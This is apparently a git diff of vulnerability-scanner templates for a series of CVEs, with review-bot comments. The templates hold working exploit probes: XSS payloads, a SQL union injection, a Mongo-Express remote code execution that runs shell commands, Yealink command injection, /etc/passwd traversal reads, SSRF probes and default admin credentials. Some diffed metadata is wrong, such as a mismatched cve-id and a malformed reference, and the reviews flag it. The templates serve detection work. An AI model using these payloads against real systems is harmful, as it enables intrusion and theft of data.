@@ -1,50 +1,35 @@ id: CVE-2020-20982 info: - name: shadoweb wdja v1.5.1 - Cross-Site Scripting - author: pikpikcu,ritikchaddha + name: Shadoweb Wdja v1.5.1 xss + author: pikpikcu severity: critical - description: shadoweb wdja v1.5.1 is susceptible to cross-site scripting because it allows attackers to execute arbitrary code and gain escalated privileges via the backurl parameter to /php/passport/index.php. - remediation: | - Upgrade to the latest version to mitigate this vulnerability. reference: - https://github.com/shadoweb/wdja/issues/1 - https://nvd.nist.gov/vuln/detail/CVE-2020-20982 + tags: cve,cve2020,xss,wdja,shadoweb classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H - cvss-score: 9.6 + cvss-score: 9.60 cve-id: CVE-2020-20982 cwe-id: CWE-79 - epss-score: 0.01894 - epss-percentile: 0.8716 - cpe: cpe:2.3:a:wdja:wdja_cms:1.5.1:*:*:*:*:*:*:* - metadata: - verified: true - max-request: 1 - vendor: wdja - product: wdja_cms - tags: cve,cve2020,xss,wdja,shadoweb + description: "Cross Site Scripting (XSS) vulnerability in shadoweb wdja v1.5.1, allows attackers to execute arbitrary code and gain escalated privileges, via the backurl parameter to /php/passport/index.php." -http: +requests: - method: GET path: + - "{{BaseURL}}/php/passport/index.php?action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - "{{BaseURL}}/passport/index.php?action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" stop-at-first-match: true - matchers-condition: and matchers: - type: word - words: - - "location.href='" condition: and + words: + - '' - type: word part: header words: - 'text/html' - - - type: status - status: - - 200 -# digest: 4b0a00483046022100c2973ea02e1ef4c983deaf88368e6cf64b25806def4904510758d9148407ade9022100cebe427a9709d4b2470349c6770aba8224a0f7d423fde903511013b36060a6f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
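Review bot: Removing `matchers-condition: and` leaves the matchers on the engine default of `or`, so the header matcher for `text/html` alone now reports this critical-severity finding on almost any HTML response. The same hunk also deletes the `status: 200` matcher, and the body word is shown as `''` here (possibly lost in rendering; if it is truly empty it matches everything). I would restore `matchers-condition: and`, keep the status matcher, and make sure the body word is the reflected marker rather than an empty string.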
diff --git a/poc/cve/CVE-2020-22211.yaml b/poc/cve/CVE-2020-22211.yaml index 25773d4621..a711842702 100644 --- a/poc/cve/CVE-2020-22211.yaml +++ b/poc/cve/CVE-2020-22211.yaml @@ -1,43 +1,32 @@ id: CVE-2020-22211 - info: name: 74cms - ajax_street.php 'key' SQL Injection author: ritikchaddha severity: critical description: | SQL Injection in 74cms 3.2.0 via the key parameter to plus/ajax_street.php. - remediation: | - Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the 'key' parameter of ajax_street.php in 74cms. reference: - https://github.com/blindkey/cve_like/issues/13 - https://nvd.nist.gov/vuln/detail/CVE-2020-22211 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 - cve-id: CVE-2020-22211 + cve-id: CVE-2020-22210 cwe-id: CWE-89 - epss-score: 0.13124 - epss-percentile: 0.94975 - cpe: cpe:2.3:a:74cms:74cms:3.2.0:*:*:*:*:*:*:* metadata: - max-request: 1 - vendor: 74cms - product: 74cms - shodan-query: http.html:"74cms" fofa-query: app="74cms" + shodan-query: http.html:"74cms" tags: cve,cve2020,74cms,sqli variables: num: "999999999" - -http: +requests: - method: GET path: - '{{BaseURL}}/plus/ajax_street.php?act=key&key=%E9%8C%A6%27%20union%20select%201,2,3,4,5,6,7,md5({{num}}),9%23' - matchers: - type: word part: body words: - '{{md5({{num}})}}' -# digest: 4a0a0047304502203d802212754921452f92aa1bc90e0e9f7d26cf8561dcadff8667daaf11d4207c022100a97ce2837eb3d3aeef62bff8690597c2b7f26a53c1867a60026ab79db48f51c4:922c64590222798bb761d5b6d8e72950 +# Enhanced by cs on 2022/06/21 diff --git a/poc/cve/CVE-2020-24391.yaml b/poc/cve/CVE-2020-24391.yaml index 77a808627e..3ad8a6889b 100644 --- a/poc/cve/CVE-2020-24391.yaml +++ b/poc/cve/CVE-2020-24391.yaml 
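Review bot: The classification now says `cve-id: CVE-2020-22210` while the template `id`, the file name and the NVD reference all say CVE-2020-22211, so anything that keys findings on `cve-id` (dashboards, ticket dedup, SBOM correlation) will file this result under the wrong CVE. The line should stay `cve-id: CVE-2020-22211`. The hunk also removes the `# digest:` trailer, so the template can no longer be checked against a signature; if that is intended for the whole mirror it deserves a line in the commit message.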
@@ -1,46 +1,39 @@ id: CVE-2020-24391 info: - name: Mongo-Express - Remote Code Execution + name: Mongo-Express Remote Code Execution author: leovalcante severity: critical description: Mongo-Express before 1.0.0 is susceptible to remote code execution because it uses safer-eval to validate user supplied javascript. Unfortunately safer-eval sandboxing capabilities are easily bypassed leading to remote code execution in the context of the node server. - remediation: | - Apply the latest security patches or updates provided by the vendor to fix this vulnerability. reference: - https://securitylab.github.com/advisories/GHSL-2020-131-mongo-express/ - https://github.com/mongo-express/mongo-express/commit/3a26b079e7821e0e209c3ee0cc2ae15ad467b91a - https://nvd.nist.gov/vuln/detail/CVE-2020-24391 - - https://github.com/mongodb-js/query-parser/issues/16 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-24391 - epss-score: 0.40297 - epss-percentile: 0.96909 - cpe: cpe:2.3:a:mongo-express_project:mongo-express:*:*:*:*:*:node.js:*:* - metadata: - max-request: 3 - vendor: mongo-express_project - product: mongo-express - framework: node.js tags: cve,cve2020,mongo,express,rce,intrusive -http: +requests: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} + - | POST /checkValid HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded document=++++++++++++%28%28%29+%3D%3E+%7B%0A++++++++const+process+%3D+clearImmediate.constructor%28%22return+process%3B%22%29%28%29%3B%0A++++++++const+result+%3D+process.mainModule.require%28%22child_process%22%29.execSync%28%22id+%3E+build%2Fcss%2F{{randstr}}.css%22%29%3B%0A++++++++console.log%28%22Result%3A+%22+%2B+result%29%3B%0A++++++++return+true%3B%0A++++%7D%29%28%29++++++++ + - | GET /public/css/{{randstr}}.css HTTP/1.1 Host: {{Hostname}} + req-condition: true + cookie-reuse: true matchers-condition: and matchers: - type: regex 
@@ -56,4 +49,5 @@ http: - type: regex regex: - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)" -# digest: 4b0a00483046022100ca0a1201e727a6e48faffdcdb0f81f232096b62059c46e8728382c13fef84e93022100ca30c6c9a6b46d6409058e2a80693a7f9ac828e08d7d019575fbe5063f174abc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/03/27 diff --git a/poc/cve/CVE-2020-27467.yaml b/poc/cve/CVE-2020-27467.yaml index 3c98e2d877..07630aa8de 100644 --- a/poc/cve/CVE-2020-27467.yaml +++ b/poc/cve/CVE-2020-27467.yaml @@ -1,12 +1,9 @@ id: CVE-2020-27467 - info: name: Processwire CMS <2.7.1 - Local File Inclusion author: 0x_Akoko severity: high description: Processwire CMS prior to 2.7.1 is vulnerable to local file inclusion because it allows a remote attacker to retrieve sensitive files via the download parameter to index.php. - remediation: | - Upgrade Processwire CMS to version 2.7.1 or later to fix the Local File Inclusion vulnerability. reference: - https://github.com/Y1LD1R1M-1337/LFI-ProcessWire - https://processwire.com/ @@ -17,27 +14,18 @@ info: cvss-score: 7.5 cve-id: CVE-2020-27467 cwe-id: CWE-22 - epss-score: 0.00913 - epss-percentile: 0.81014 - cpe: cpe:2.3:a:processwire:processwire:*:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: processwire - product: processwire tags: cve,cve2020,processwire,lfi,cms,oss - -http: +requests: - method: GET path: - "{{BaseURL}}/index.php?download=/etc/passwd" - matchers-condition: and matchers: - type: regex regex: - "root:[x*]:0:0" - - type: status status: - 200 -# digest: 490a004630440220359e5223f0075a53d6563ae10de348408e8bce1d5e896363b3d4da09df30d1cc022042bd0751e0bc5d336755989f45d3dde01d88816b459e683e1a45bf290b910ebc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/07/15 diff --git a/poc/cve/CVE-2020-27735.yaml b/poc/cve/CVE-2020-27735.yaml index 0d82b84cf7..c21d20e924 100644 --- a/poc/cve/CVE-2020-27735.yaml +++ b/poc/cve/CVE-2020-27735.yaml 
@@ -1,49 +1,36 @@ -id: CVE-2020-27735 - -info: - name: Wing FTP 6.4.4 - Cross-Site Scripting - author: pikpikcu - severity: medium - description: | - Wing FTP 6.4.4 is vulnerable to cross-site scripting via its web interface because an arbitrary IFRAME element can be included in the help pages via a crafted link, leading to the execution of (sandboxed) arbitrary HTML and JavaScript in the user's browser. - remediation: | - Upgrade to the latest version of Wing FTP server or apply the vendor-provided patch to mitigate this vulnerability. - reference: - - https://www.wftpserver.com/serverhistory.htm - - https://wshenk.blogspot.com/2021/01/xss-in-wing-ftps-web-interface-cve-2020.html - - https://nvd.nist.gov/vuln/detail/CVE-2020-27735 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2020-27735 - cwe-id: CWE-79 - epss-score: 0.00216 - epss-percentile: 0.59497 - cpe: cpe:2.3:a:wftpserver:wing_ftp_server:6.4.4:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: wftpserver - product: wing_ftp_server - tags: cve,cve2020,xss,wing-ftp - -http: - - method: GET - path: - - "{{BaseURL}}/help/english/index.html?javascript:alert(document.domain)" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '"]}' + - type: word part: header words: - text/html + - type: status status: - 200 - -# Enhanced by cs 06/21/2022 +# digest: 490a004630440220178100e041c53995fa4f17cc62e294cbee55bd22e1ee2145698eda13ac63cc7a02203ac6bf2f46cada4604113cc871b16b8c7b97c85a716678fc47d6f2385c057724:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2021-25112.yaml b/poc/cve/CVE-2021-25112.yaml index d26455b311..8da07378c7 100644 --- a/poc/cve/CVE-2021-25112.yaml +++ b/poc/cve/CVE-2021-25112.yaml 
@@ -1,20 +1,33 @@ id: CVE-2021-25112 + info: - name: WHMCS Bridge < 6.4b - Authenticated Reflected XSS - author: DhiyaneshDK + name: WordPress WHMCS Bridge <6.4b - Cross-Site Scripting + author: dhiyaneshDk severity: medium description: | - The plugin does not sanitise and escape the error parameter before outputting it back in admin dashboard, leading to a Reflected Cross-Site Scripting + WordPress WHMCS Bridge plugin before 6.4b contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the error parameter before outputting it back in the admin dashboard. + remediation: | + Update WordPress WHMCS Bridge to version 6.4b or later to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/4aae2dd9-8d51-4633-91bc-ddb53ca3471c - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25112 - tags: cve,cve2021,wordpress,xss,wp-plugin,authenticated + - https://plugins.trac.wordpress.org/changeset/2659751 + - https://nvd.nist.gov/vuln/detail/CVE-2021-25112 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2021-25112 cwe-id: CWE-79 -requests: + epss-score: 0.001 + epss-percentile: 0.41034 + cpe: cpe:2.3:a:i-plugins:whmcs_bridge:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 2 + vendor: i-plugins + product: whmcs_bridge + framework: wordpress + tags: whmcs,xss,wpscan,wordpress,wp-plugin,wp,authenticated + +http: - raw: - | POST /wp-login.php HTTP/1.1 
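Review bot: The new `tags:` line drops `cve` and `cve2021`, although the template id is still CVE-2021-25112 and the other CVE templates in this commit keep both tags. A scan or report filtered on the `cve` tag will silently skip this template. I would write `tags: cve,cve2021,whmcs,xss,wpscan,wordpress,wp-plugin,wp,authenticated`.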
@@ -27,17 +40,20 @@ requests: - | GET /wp-admin/options-general.php?page=cc-ce-bridge-cp&error=%3Cimg%20src%20onerror=alert(document.domain)%3E HTTP/1.1 Host: {{Hostname}} - cookie-reuse: true + matchers-condition: and matchers: - type: word part: body words: - - "" + - "" + - type: word part: header words: - text/html + - type: status status: - 200 +# digest: 4a0a0047304502204157a558f83ea3fb9c716eaff70338138d192142cd094fdf51503b2dfdf22b97022100e272c6339af42d1b5f963685ffa7632bc9a3b39feb79acdfb2d52827604b0231:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2021-25118.yaml b/poc/cve/CVE-2021-25118.yaml index f037f16c59..93fa616ed1 100644 --- a/poc/cve/CVE-2021-25118.yaml +++ b/poc/cve/CVE-2021-25118.yaml 
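Review bot: This hunk deletes `cookie-reuse: true` from a template whose second request (`/wp-admin/options-general.php`) only works with the session cookie set by the `wp-login.php` request, so the template is only correct on an engine that reuses cookies by default. Elsewhere in this same commit `cookie-reuse: true` is added (CVE-2020-24391, CVE-2021-26598) and `http:` is changed back to `requests:`, so the set does not target one engine version consistently. If older engines are still supported, keep `cookie-reuse: true` here; otherwise remove it everywhere and state the minimum engine version. The request block starts above this hunk.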
@@ -1,39 +1,54 @@ id: CVE-2021-25118 + info: - name: Yoast SEO < 17.3 - Path Disclosure + name: Yoast SEO 16.7-17.2 - Information Disclosure author: DhiyaneshDK severity: medium - description: The plugin discloses the full internal path of featured images in posts via the wp/v2/posts REST endpoints which could help an attacker identify other vulnerabilities or help during the exploitation of other identified vulnerabilities. + description: Yoast SEO plugin 16.7 to 17.2 is susceptible to information disclosure, The plugin discloses the full internal path of featured images in posts via the wp/v2/posts REST endpoints, which can help an attacker identify other vulnerabilities or help during the exploitation of other identified vulnerabilities. + remediation: Fixed in version 17.3. reference: - https://wpscan.com/vulnerability/2c3f9038-632d-40ef-a099-6ea202efb550 - - https://nvd.nist.gov/vuln/detail/CVE-2021-25118 - https://plugins.trac.wordpress.org/changeset/2608691 - remediation: Fixed in version 17.3 + - https://nvd.nist.gov/vuln/detail/CVE-2021-25118 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2021-25118 cwe-id: CWE-200 - tags: wordpress,cve2021,wp-plugin,fpd,cve,wp -requests: + epss-score: 0.00155 + epss-percentile: 0.51839 + cpe: cpe:2.3:a:yoast:yoast_seo:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 1 + vendor: yoast + product: yoast_seo + framework: wordpress + tags: wpscan,wordpress,cve2021,wp-plugin,fpd,cve,wp + +http: - method: GET path: - "{{BaseURL}}/wp-json/wp/v2/posts?per_page=1" + matchers-condition: and matchers: - - type: regex - regex: - - '"path":"(.*)/wp-content\\(.*)","size' - type: word part: header words: - "application/json" + + - type: regex + regex: + - '"path":"(.*)/wp-content\\(.*)","size' + - type: status status: - 200 + extractors: - type: regex - part: body group: 1 regex: - '"path":"(.*)/wp-content\\(.*)","size' + part: body +# digest: 
4a0a00473045022040802fa6e5d672517b289ec0f5e1f88b5a6a41252698324c1b2bfb835c07b21b022100abfd5dd1973ff76a497fd60ca24218bd80f24fb549131b1214fb3c1e096e2741:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2021-26085.yaml b/poc/cve/CVE-2021-26085.yaml index f2032f23ff..35a0fae63e 100644 --- a/poc/cve/CVE-2021-26085.yaml +++ b/poc/cve/CVE-2021-26085.yaml 
@@ -1,34 +1,47 @@ id: CVE-2021-26085 + info: - name: Confluence Pre-Authorization Arbitrary File Read in /s/ endpoint - CVE-2021-26085 + name: Atlassian Confluence Server - Local File Inclusion author: princechaddha severity: medium - description: Affected versions of Atlassian Confluence Server allow remote attackers to view restricted resources via a Pre-Authorization Arbitrary File Read vulnerability in the /s/ endpoint. + description: Atlassian Confluence Server allows remote attackers to view restricted resources via local file inclusion in the /s/ endpoint. + remediation: | + Apply the latest security patches provided by Atlassian to fix the vulnerability. reference: - https://packetstormsecurity.com/files/164401/Atlassian-Confluence-Server-7.5.1-Arbitrary-File-Read.html - - https://nvd.nist.gov/vuln/detail/CVE-2021-26085 - https://jira.atlassian.com/browse/CONFSERVER-67893 + - https://nvd.nist.gov/vuln/detail/CVE-2021-26085 - http://packetstormsecurity.com/files/164401/Atlassian-Confluence-Server-7.5.1-Arbitrary-File-Read.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2021-26085 - cwe-id: CWE-862 + cwe-id: CWE-425 + epss-score: 0.96595 + epss-percentile: 0.99516 + cpe: cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:* metadata: + max-request: 1 + vendor: atlassian + product: confluence_data_center shodan-query: http.component:"Atlassian Confluence" - tags: cve,cve2021,confluence,atlassian,lfi,kev -requests: + tags: kev,packetstorm,cve,cve2021,confluence,atlassian,lfi,intrusive + +http: - method: GET path: - "{{BaseURL}}/s/{{randstr}}/_/;/WEB-INF/web.xml" + matchers-condition: and matchers: - - type: status - status: - - 200 - type: word part: body words: - - "Confluence" - - "com.atlassian.confluence.setup.ConfluenceAppConfig" + - Confluence + - com.atlassian.confluence.setup.ConfluenceAppConfig condition: and + + - type: status + status: + - 200 +# digest: 
490a0046304402205608f66fa0fffdfb3eff84f4f2cc72fbeae000d4a1beff24b6de5ce9617e6b1802201be690bfcdfa4cd01b22b872732965b3a0f232561ee9916b89f1e412436d4f52:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2021-26598.yaml b/poc/cve/CVE-2021-26598.yaml index 14c46c8ccb..e2aa82c030 100644 --- a/poc/cve/CVE-2021-26598.yaml +++ b/poc/cve/CVE-2021-26598.yaml @@ -1,33 +1,23 @@ id: CVE-2021-26598 - info: - name: ImpressCMS <1.4.3 - Incorrect Authorization + name: ImpressCMS - Incorrect Authorization author: gy741,pdteam severity: medium - description: ImpressCMS before 1.4.3 is susceptible to incorrect authorization via include/findusers.php. An attacker can provide a security token and potentially obtain sensitive information, modify data, and/or execute unauthorized operations. - remediation: | - Upgrade to ImpressCMS version 1.4.3 or later to fix the vulnerability. + description: ImpressCMS before 1.4.3 has Incorrect Access Control because include/findusers.php allows access by unauthenticated attackers (who are, by design, able to have a security token). reference: - https://hackerone.com/reports/1081137 - http://karmainsecurity.com/KIS-2022-03 - https://github.com/ImpressCMS - https://nvd.nist.gov/vuln/detail/CVE-2021-26598 + metadata: + shodan-query: http.html:"ImpressCMS" + tags: cve,cve2021,impresscms,unauth,cms classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 + cvss-score: 5.30 cve-id: CVE-2021-26598 cwe-id: CWE-287 - epss-score: 0.00506 - epss-percentile: 0.73807 - cpe: cpe:2.3:a:impresscms:impresscms:*:*:*:*:*:*:*:* - metadata: - max-request: 2 - vendor: impresscms - product: impresscms - shodan-query: http.html:"ImpressCMS" - tags: hackerone,cve,cve2021,impresscms,unauth,cms - -http: +requests: - raw: - | GET /misc.php?action=showpopups&type=friend HTTP/1.1 
@@ -37,7 +27,8 @@ http: GET /include/findusers.php?token={{token}} HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36 - + cookie-reuse: true + req-condition: true matchers-condition: and matchers: - type: word @@ -47,17 +38,14 @@ http: - 'user_regdate' - 'uname' condition: and - - type: status status: - 200 - extractors: - type: regex name: token + internal: true group: 1 regex: - "REQUEST' value='(.*?)'" - 'REQUEST" value="(.*?)"' - internal: true -# digest: 490a00463044022035d2ea3a5c334d1769f2e637835ba312fd925bea23bae3848a0e74c59db17be4022049b2bd02389cbdc4bc4e525235ec92878012a044788d75b00e6fdc846d2ee9a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2021-27519.yaml b/poc/cve/CVE-2021-27519.yaml index b2810d0ffd..97b1350cae 100644 --- a/poc/cve/CVE-2021-27519.yaml +++ b/poc/cve/CVE-2021-27519.yaml 
@@ -1,52 +1,38 @@ id: CVE-2021-27519 - info: - name: FUDForum 3.1.0 - Cross-Site Scripting + name: FUDForum 3.1.0 - Reflected XSS author: kh4sh3i severity: medium description: | - FUDForum 3.1.0 contains a cross-site scripting vulnerability which allows remote attackers to inject JavaScript via index.php in the "srch" parameter. - remediation: | - Upgrade to the latest version of FUDForum or apply the provided patch to fix the XSS vulnerability. + A cross-site scripting (XSS) issue in FUDForum 3.1.0 allows remote attackers to inject JavaScript reference: - https://www.exploit-db.com/exploits/49942 + - https://nvd.nist.gov/vuln/detail/CVE-2021-27519 - https://github.com/fudforum/FUDforum/issues/2 - http://packetstormsecurity.com/files/162942/FUDForum-3.1.0-Cross-Site-Scripting.html - - https://nvd.nist.gov/vuln/detail/CVE-2021-27519 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-27519 cwe-id: CWE-79 - epss-score: 0.00189 - epss-percentile: 0.56336 - cpe: cpe:2.3:a:fudforum:fudforum:3.1.0:*:*:*:*:*:*:* metadata: - verified: true - max-request: 1 - vendor: fudforum - product: fudforum shodan-query: 'http.html:"Powered by: FUDforum"' - tags: xss,fudforum,edb,packetstorm,cve,cve2021 - -http: + verified: "true" + tags: cve,cve2021,xss,fudforum +requests: - method: GET path: - '{{BaseURL}}/index.php?SQ=0&srch=x"+onmouseover%3Dalert%281%29+x%3D"&t=search&btn_submit.x=0&btn_submit.y=0' - matchers-condition: and matchers: - type: word part: body words: - 'highlightSearchTerms("x" onmouseover=alert(1) x="");' - - type: word part: header words: - text/html - - type: status status: - 200 -# digest: 490a004630440220084f6621eba790d31297e5e928924893d763e357dc29af702e750cbd5d56d359022050642b7feff352e1dab8869ce964e29daa409b039e679dcfdcc868159ce69a6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2021-27561.yaml b/poc/cve/CVE-2021-27561.yaml index 80ea67d3c3..43fc56b7dd 100644 
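Review bot: The replacement description ends at "allows remote attackers to inject JavaScript" and loses the part a triager needs, namely that the injection is through the `srch` parameter of `index.php`; the removed `remediation:` field is not replaced either. I would keep the old sentence, `FUDForum 3.1.0 contains a cross-site scripting vulnerability which allows remote attackers to inject JavaScript via index.php in the "srch" parameter.` Separately, `verified: "true"` is now a quoted string while other templates in this commit use the boolean `verified: true`; consumers that test the field as a boolean may treat the two differently.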
--- a/poc/cve/CVE-2021-27561.yaml +++ b/poc/cve/CVE-2021-27561.yaml @@ -5,6 +5,8 @@ info: author: shifacyclewala,hackergautam severity: critical description: Yealink Device Management (DM) 3.6.0.20 allows command injection as root via the /sm/api/v1/firewall/zone/services URI, without authentication. + remediation: | + Update to the latest firmware version provided by the vendor to mitigate this vulnerability. reference: - https://ssd-disclosure.com/ssd-advisory-yealink-dm-pre-auth-root-level-rce/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-27561 @@ -13,10 +15,17 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-27561 - cwe-id: CWE-77 + cwe-id: CWE-78 + epss-score: 0.97456 + epss-percentile: 0.9995 + cpe: cpe:2.3:a:yealink:device_management:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: yealink + product: device_management tags: cve,cve2021,rce,yealink,mirai,kev -requests: +http: - method: GET path: - "{{BaseURL}}/premise/front/getPingData?url=http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id;" @@ -24,12 +33,12 @@ requests: matchers-condition: and matchers: - type: word - condition: and part: body words: - 'uid' - 'gid' - 'groups' + condition: and - type: word part: header @@ -44,5 +53,4 @@ requests: - type: regex regex: - "(u|g)id=.*" - -# Enhanced by mp on 2022/05/17 +# digest: 4a0a00473045022100d136052c57fae8c1d196da8a3b7604b75f18abb7f8264d25a9e076a0de2eca2a02201f43855f21480b178e19fe9dbc464e92badcc2bbee44b4112a3d4148b21fc30c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2021-27748.yaml b/poc/cve/CVE-2021-27748.yaml index 23f9aef7c7..90316ed9a6 100644 --- a/poc/cve/CVE-2021-27748.yaml +++ b/poc/cve/CVE-2021-27748.yaml 
@@ -1,33 +1,43 @@ id: CVE-2021-27748 + info: name: IBM WebSphere HCL Digital Experience - Server-Side Request Forgery author: pdteam severity: high description: | - IBM WebSphere HCL Digital Experience is susceptible to server-side request forgery vulnerability that impacts on-premise deployments and containers. + IBM WebSphere HCL Digital Experience is vulnerable to server-side request forgery that impacts on-premise deployments and containers. + remediation: | + Apply the latest security patches or updates provided by IBM to mitigate this vulnerability. reference: - https://blog.assetnote.io/2021/12/26/chained-ssrf-websphere/ - https://support.hcltechsw.com/csm?id=kb_article&sysparm_article=KB0095665 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27748 + - hhttps://nvd.nist.gov/vuln/detail/CVE-2022-31268 classification: cve-id: CVE-2021-27748 metadata: verified: true + max-request: 2 shodan-query: http.html:"IBM WebSphere Portal" tags: cve,cve2021,hcl,ibm,ssrf,websphere -requests: + +http: - method: GET path: - - '{{BaseURL}}/docpicker/internal_proxy/http/interact.sh' - - '{{BaseURL}}/wps/PA_WCM_Authoring_UI/proxy/http/interact.sh' - redirects: true + - '{{BaseURL}}/docpicker/internal_proxy/http/oast.me' + - '{{BaseURL}}/wps/PA_WCM_Authoring_UI/proxy/http/oast.me' + + host-redirects: true max-redirects: 2 stop-at-first-match: true + matchers-condition: and matchers: - type: word words: - "Interactsh Server" + - type: status status: - 200 + +# digest: 4a0a0047304502200d8020b3a03e84cf3bd87a7632f865e6057f37365325c521fabb4a70dadc061d022100bddaa747926664b7fbf81cce7b87cc9d0b411c9c1a63f64776edd962f4d3d1e5:922c64590222798bb761d5b6d8e72950 diff --git a/poc/cve/CVE-2021-28149.yaml b/poc/cve/CVE-2021-28149.yaml index 06724b91bc..18c48fcc12 100644 --- a/poc/cve/CVE-2021-28149.yaml +++ b/poc/cve/CVE-2021-28149.yaml 
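Review bot: The added reference `- hhttps://nvd.nist.gov/vuln/detail/CVE-2022-31268` has a malformed scheme and points at a different CVE than the template's `cve-id: CVE-2021-27748`; it should read `- https://nvd.nist.gov/vuln/detail/CVE-2021-27748`. The two probe paths now name the fixed public host `oast.me`, and the match is the body word `Interactsh Server`, so a positive result depends on that third-party host being reachable from the target and still serving that banner. A short comment above the `path:` list saying so would help whoever has to explain a missed detection on an egress-filtered network.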
@@ -1,32 +1,21 @@ id: CVE-2021-28149 - info: - name: Hongdian H8922 3.0.5 Devices - Local File Inclusion + name: Hongdian Directory Traversal author: gy741 severity: medium description: | - Hongdian H8922 3.0.5 devices are vulnerable to local file inclusion. The /log_download.cgi log export handler does not validate user input and allows a remote attacker with minimal privileges to download any file from the device by substituting ../ (e.g., ../../etc/passwd) This can be carried out with a web browser by changing the file name accordingly. Upon visiting log_download.cgi?type=../../etc/passwd and logging in, the web server will allow a download of the contents of the /etc/passwd file. - remediation: | - Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in Hongdian H8922 3.0.5 Devices. + Hongdian H8922 3.0.5 devices allow Directory Traversal. The /log_download.cgi log export handler does not validate user input and allows a remote attacker with minimal privileges to download any file from the device by substituting ../ (e.g., ../../etc/passwd) This can be carried out with a web browser by changing the file name accordingly. Upon visiting log_download.cgi?type=../../etc/passwd and logging in, the web server will allow a download of the contents of the /etc/passwd file. 
reference: - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/ - - http://en.hongdian.com/Products/Details/H8922 - https://nvd.nist.gov/vuln/detail/CVE-2021-28149 + - http://en.hongdian.com/Products/Details/H8922 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 6.5 cve-id: CVE-2021-28149 cwe-id: CWE-22 - epss-score: 0.06892 - epss-percentile: 0.93204 - cpe: cpe:2.3:o:hongdian:h8922_firmware:3.0.5:*:*:*:*:*:*:* - metadata: - max-request: 2 - vendor: hongdian - product: h8922_firmware tags: cve,cve2021,hongdian,traversal - -http: +requests: - raw: - | GET /log_download.cgi?type=../../etc/passwd HTTP/1.1 @@ -37,22 +26,18 @@ http: GET /log_download.cgi?type=../../etc/passwd HTTP/1.1 Host: {{Hostname}} Authorization: Basic YWRtaW46YWRtaW4= - matchers-condition: and matchers: + - type: status + status: + - 200 - type: word - part: header words: - "application/octet-stream" - + part: header - type: regex - part: body regex: - "root:.*:0:0:" - "sshd:[x*]" - "root:[$]" - - - type: status - status: - - 200 -# digest: 4a0a00473045022100e174dacb46e1f41c1520f1358b500dd517aec2455a915ad250834066edcf2a320220021274ed905c6a0bf765c9cba4d31c340a0066b81bfd4d2cf6c696c869311edd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + part: body diff --git a/poc/cve/CVE-2021-28150.yaml b/poc/cve/CVE-2021-28150.yaml index 729503f7e2..41e5c3d5da 100644 --- a/poc/cve/CVE-2021-28150.yaml +++ b/poc/cve/CVE-2021-28150.yaml 
